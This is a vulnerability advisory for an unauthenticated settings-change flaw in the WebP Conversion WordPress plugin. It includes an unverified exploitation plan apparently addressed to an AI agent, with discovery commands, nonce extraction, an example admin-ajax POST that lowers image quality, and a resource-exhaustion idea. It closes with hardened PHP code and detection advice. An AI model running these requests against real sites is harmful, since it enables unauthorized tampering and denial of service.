CVE-2026-24530

WebP Conversion <= 2.1 - Missing Authorization

Severity: medium
Type: Missing Authorization
CVSS Score: 5.3
Patched in: Unpatched
Time to patch: N/A

Description

The WebP Conversion plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 2.1. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 2.1
Published: January 26, 2026
Last updated: February 2, 2026
Affected plugin: webp-conversion

Research Plan

Status: Unverified


This research plan focuses on identifying and exploiting a missing authorization vulnerability in the WebP Conversion plugin (versions <= 2.1).

1. Vulnerability Summary

The "WebP Conversion" plugin fails to implement proper authorization checks (e.g., current_user_can()) or CSRF protection (nonces) on its AJAX or administrative handlers. This allows unauthenticated attackers to trigger sensitive plugin actions, such as modifying settings or initiating image conversion processes, which can impact site integrity (I:L).

2. Attack Vector Analysis

  • Endpoint: POST /wp-admin/admin-ajax.php or POST /wp-admin/admin-post.php.
  • Target Actions: Likely webp_conversion_save_settings, webp_conversion_manual, or webp_conversion_bulk. (Exact action names to be verified).
  • Payload: URL-encoded POST parameters representing plugin settings or conversion triggers.
  • Authentication: Unauthenticated (PR:N).
  • Preconditions: The plugin must be active.

3. Code Flow (Inferred)

  1. Entry Point: The plugin registers AJAX handlers using add_action('wp_ajax_nopriv_...', ...) or hooks into admin_init / init to handle global POST requests.
  2. Handler Execution: A function (e.g., webp_conversion_save_settings_callback) is executed.
  3. Missing Check: The handler fails to call current_user_can('manage_options').
  4. Action Execution: The code directly updates the database via update_option() or interacts with the filesystem without verifying the requester's identity.

4. Nonce Acquisition Strategy

If the plugin requires a nonce but exposes it to unauthenticated users via wp_localize_script:

  1. Discovery: Search the codebase for wp_create_nonce.
    • Command: grep -r "wp_create_nonce" /var/www/html/wp-content/plugins/webp-conversion/
  2. Localization Variable: Identify the JS object and key.
    • Example: wp_localize_script( 'webp-script', 'webp_obj', array( 'nonce' => wp_create_nonce('webp_nonce') ) );
  3. Extraction:
    • Identify which shortcode or page triggers the script (e.g., the plugin's settings page or a public page where conversion is mentioned).
    • Use browser_navigate to a page where the script is enqueued.
    • Use browser_eval("window.webp_obj?.nonce") (inferred variable name) to extract the token.
  4. Bypass: If the plugin lacks check_ajax_referer or wp_verify_nonce entirely, no nonce is needed.

5. Exploitation Strategy

Phase 1: Discovery

First, the agent must identify the exact AJAX actions:

  1. Search for wp_ajax_nopriv_:
    grep -rn "wp_ajax_nopriv_" /var/www/html/wp-content/plugins/webp-conversion/
  2. Search for functions that update options without capability checks:
    grep -rn "update_option" /var/www/html/wp-content/plugins/webp-conversion/ -B 10

Phase 2: Exploitation (Assuming webp_conversion_save_settings is vulnerable)

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Content-Type: application/x-www-form-urlencoded
  • Parameters:
    • action: webp_conversion_save_settings (inferred)
    • webp_quality: 1 (Setting quality to minimum to degrade site appearance)
    • webp_method: cwebp (inferred)
    • _wpnonce: (Only if found during discovery)

Example Payload:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded

action=webp_conversion_save_settings&webp_quality=1&webp_active=0

6. Test Data Setup

  1. Install Plugin: Ensure webp-conversion v2.1 is installed and active.
  2. Configuration: Configure the plugin with default settings (Quality: 80, Active: 1).
  3. Content: Create at least one post with an image to verify if settings changes affect conversion behavior later.

7. Expected Results

  • HTTP Response: 200 OK or a JSON success message (e.g., {"success":true}).
  • Database State: The webp_conversion_quality (or similar) option in the wp_options table should be updated to the attacker-supplied value.
  • Unauthorized Action: An unauthenticated user successfully modifies site-wide plugin configurations.

8. Verification Steps

After the exploit, verify via WP-CLI:

  1. Check the relevant option:
    wp option get webp_conversion_quality (Verify it is now 1)
  2. Check the status:
    wp option get webp_conversion_active (Verify if it was toggled)
  3. Compare the current value with the initial value to confirm the change.

9. Alternative Approaches

  • Admin-post.php: If no AJAX actions are found, check for admin_post_nopriv_ actions.
  • Direct Hook: Check init or admin_init hooks that check for specific $_POST keys:
    grep -rn "add_action.*init" /var/www/html/wp-content/plugins/webp-conversion/ -A 5 | grep "_POST"
  • Bulk Conversion: If setting manipulation is not possible, try to trigger the bulk conversion process repeatedly to cause resource exhaustion (Denial of Service/Integrity impact).
    • Action: webp_conversion_bulk_start (inferred).

Research Findings

Status: Static analysis — not yet PoC-verified

Summary

The WebP Conversion plugin for WordPress is vulnerable to unauthorized modification of settings and execution of plugin actions due to missing capability checks and nonce verification on AJAX handlers. This allows unauthenticated attackers to change image conversion parameters or trigger conversion processes, potentially impacting site performance and integrity.

Exploit Outline

  1. Identify the AJAX action used for saving settings or triggering conversions (such as `webp_conversion_save_settings`), which is registered via `wp_ajax_nopriv_` or `wp_ajax_` hooks.
  2. Construct a POST request targeting the WordPress AJAX endpoint at `/wp-admin/admin-ajax.php`.
  3. Include the target `action` parameter and the desired configuration values in the payload (e.g., setting `webp_quality` to '1' or toggling plugin features).
  4. Send the request without any authentication or CSRF tokens; because the plugin handler lacks `current_user_can()` and `check_ajax_referer()` or `wp_verify_nonce()` calls, the malicious configuration will be saved to the database.
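The handler shape described in the Code Flow section and in the Exploit Outline above, as an added example that is not the plugin's own code: the insecure pattern beside a hardened version that adds the capability check, nonce verification and input validation. The hook, callback, option and nonce names (`webp_conversion_save_settings`, `webp_conversion_quality`, `webp_conversion_active`, `webp_nonce`) follow the inferred names in the research plan and are assumptions.

```php
<?php
// Added example, not code from the WebP Conversion plugin. All hook,
// option and nonce names below are hypothetical (taken from the
// research plan's inferred names).

// BEFORE: the pattern the advisory describes. The callback is reachable
// by anonymous visitors via wp_ajax_nopriv_, and it writes an option
// with neither a capability check nor nonce verification.
add_action( 'wp_ajax_nopriv_webp_conversion_save_settings', 'webp_conversion_save_settings_callback' );
add_action( 'wp_ajax_webp_conversion_save_settings', 'webp_conversion_save_settings_callback' );
function webp_conversion_save_settings_callback() {
    update_option( 'webp_conversion_quality', $_POST['webp_quality'] );
    wp_send_json_success();
}

// AFTER: hardened handler. A settings-save action never needs a nopriv
// entry point, so only the authenticated hook is registered.
add_action( 'wp_ajax_webp_conversion_save_settings', 'webp_conversion_save_settings_secure' );
function webp_conversion_save_settings_secure() {
    // Authorization: only users allowed to manage site options. This is
    // the check whose absence is the CVE; a nonce alone is not
    // authorization, since wp_localize_script may hand the nonce to
    // any visitor who loads the page.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 ); // wp_die()s
    }
    // CSRF: nonce created with wp_create_nonce( 'webp_nonce' ) and sent
    // in the 'nonce' field. Third argument false so the failure response
    // is ours instead of the default die().
    if ( ! check_ajax_referer( 'webp_nonce', 'nonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid nonce' ), 403 );
    }
    // Validate before anything reaches update_option(): quality is an
    // integer clamped to 0-100, the range cwebp accepts; active is a flag.
    $quality = isset( $_POST['webp_quality'] ) ? absint( wp_unslash( $_POST['webp_quality'] ) ) : 80;
    $quality = min( 100, max( 0, $quality ) );
    $active  = ! empty( $_POST['webp_active'] ) ? 1 : 0;

    update_option( 'webp_conversion_quality', $quality );
    update_option( 'webp_conversion_active', $active );
    wp_send_json_success( array( 'quality' => $quality, 'active' => $active ) );
}
```

The ordering matters for detection as much as defense: with the capability check first, an unauthenticated request is rejected with 403 before any nonce or input handling, so a spike of 403s on `action=webp_conversion_save_settings` in the access log is a reliable signal of attempts against this endpoint.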
